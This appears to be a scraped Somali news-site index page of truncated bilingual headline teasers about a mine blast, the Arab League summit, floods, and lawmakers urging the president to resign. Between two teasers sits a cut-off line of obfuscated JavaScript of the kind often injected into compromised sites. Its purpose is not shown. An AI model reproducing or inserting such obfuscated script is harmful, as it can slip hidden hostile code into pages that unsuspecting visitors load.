Ugu yaraan 5 Qof oo ku Dhaawacmay Qarax Miino ka Dhacay Degmada Kaxda
Muqdisho, Soomaaliya – Ugu yaraan shan qof ayaa ku dhaawacmay, kadib markii qarax miino uu galabnimadii shalay ka dhacay xaafadda Cali Goley ee degmada Kaxda, gobolka Banaadir.
Qaraxa ayaa lala eegtay koox dhalinyaro ah iyo ciidamo ku sugnaa goobtaasi xilliga uu qaraxu dhacay.
Ilo wareedyo lagu kalsoon yahay oo ku sugan degmada Kaxda ayaa u sheegay Shabelle in dadka dhaawacmay ay...
Somali President Arrives in Baghdad for Arab League Summit
Baghdad, Iraq – Somali President Hassan Sheikh Mohamud arrived in Baghdad on Thursday to attend the 34th session of the Arab League Summit, where leaders from across the Arab world are gathering to address pressing regional challenges.
The summit will focus on finding sustainable solutions to ongoing political and security crises affecting several parts of the Arab region. Key agenda...
Madaxweynaha Soomaaliya oo Gaaray Baqdaad si uu uga Qaybgalo Shirka Jaamacadda Carabta
Baqdaad, Ciraaq – Madaxweynaha Soomaaliya, Xasan Sheekh Maxamuud, ayaa maanta gaaray magaalada Baqdaad ee caasimadda dalka Ciraaq, halkaas oo uu uga qaybgalayo meertada 34-aad ee Shirka Jaamacadda Carabta.
Shirkan oo ay isugu imanayaan madaxda waddamada Carabta ayaa diiradda lagu saari doonaa sidii xal waara loogu heli lahaa xasaradaha amni iyo siyaasadeed ee ka jira meelo badan oo ka mid ah...
Wasiirka Arrimaha Dibadda oo Kulan Doceedyo Muhiim ah la yeeshay Dhigiisa Jabuuti iyo Aljeeriya
BAQDAAD, 16 May 2025 – Wasiirka Arrimaha Dibadda iyo Iskaashiga Caalamiga ah ee Xukuumadda Federaalka Soomaaliya, Mudane Cabdisalaam Cabdi Cali, ayaa maanta kulan doceedyo miro-dhal ah la yeeshay Wasiirrada Arrimaha Dibadda ee Jamhuuriyadda Jabuuti iyo Jamhuuriyadda Dimuqraadiga ee Aljeeriya, xilli uu ku sugan yahay magaalada Baqdaad ee dalka Ciraaq.
Kulamadan oo ka dhacay hareeraha shir madaxeedka Jaamacadda Carabta, ayaa diiradda...
Somalia’s Foreign Minister Holds Key Bilateral Talks with Djibouti and Algeria Counterparts
BAGHDAD, May 16, 2025 – Somalia’s Minister of Foreign Affairs and International Cooperation, Abdisalam Omer Hadliye, held high-level bilateral meetings today with his counterparts from Djibouti and Algeria on the sidelines of the Arab League summit in Baghdad.
The talks, described as productive and forward-looking, focused on strengthening bilateral relations and enhancing cooperation in the areas of politics, security, economy,...
Fatahaadda Soomaaliya: 17 Qof oo Geeriyooday iyo In Ka Badan 84,000 oo Barakacay
MUQDISHO, Soomaaliya – Ugu yaraan 17 qof ayaa ku dhintay in ka badan 84,000 oo kalena waa ay barakaceen daadad xoogan oo ka dhashay roobab mahiigaan ah oo ka da’ay guud ahaan Soomaaliya tan iyo bartamihii Abriil, sida ay sheegtay Hay’adda Qaramada Midoobay u qaabilsan isku dubaridka gargaarka bini’aadantinimo (OCHA).
OCHA ayaa sheegtay in qiimeyn ay sameeyeen mas’uuliyiinta maaraynta musiibooyinka...
Flash floods kill 17, displace over 84,000 in Somalia
MOGADISHU, Somalia -- At least 17 people have been killed and more than 84,000 others displaced by flash floods following torrential rains across Somalia since mid-April, the United Nations relief agency said on Tuesday.
The UN Office for the Coordination of Humanitarian Affairs (OCHA) said an assessment conducted by disaster management officials has revealed extensive damage to infrastructure and an...
Over 100 Somali lawmakers call for President Mohamud’s resignation
MOGADISHU, Somalia – More than 100 Somali lawmakers on Thursday jointly called for President Hassan Sheikh Mohamud to step down, accusing him of constitutional violations and failed leadership amid mounting national crises.
In a statement signed by 103 members from both houses of Somalia’s federal parliament, the lawmakers accused the president of “deliberately violating the constitution” and failing to fulfill...
Xildhibaanno ugu baaqey Madaxweyne Xasan Sheekh inuu is-casilo
MUQDISHO, Soomaaliya - Illaa 103 mudane oo kamid ah labada Golle ee Baarlamaanka dalka ayaa ugu baaqey Madaxweyne Xasan Sheekh inuu xilka iska-casilo, iyagoo u jeediyay eedeymo culus.
War-murtiyeed ay soo saareen Khamiistii Shalay ayay Xildhibaanadii ugu badnaa oo uga digay Madaxweynaha inuu dalka halis galiyo, waxayna kula taliyeen inuu dib ugu soo laabto Sharciga.
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function...
Somali President Lays Wreath at SYL Monument in Honour of Youth Day
MOGADISHU – Somalia’s President Hassan Sheikh Mohamud on Thursday laid a wreath at the SYL monument in the capital, Mogadishu, to commemorate the country's Youth Day, marking the historic struggle of the Somali Youth League (SYL) for independence.
The ceremony paid tribute to the 13 founding members of the SYL, whose nationalist movement played a central role in securing Somalia’s...









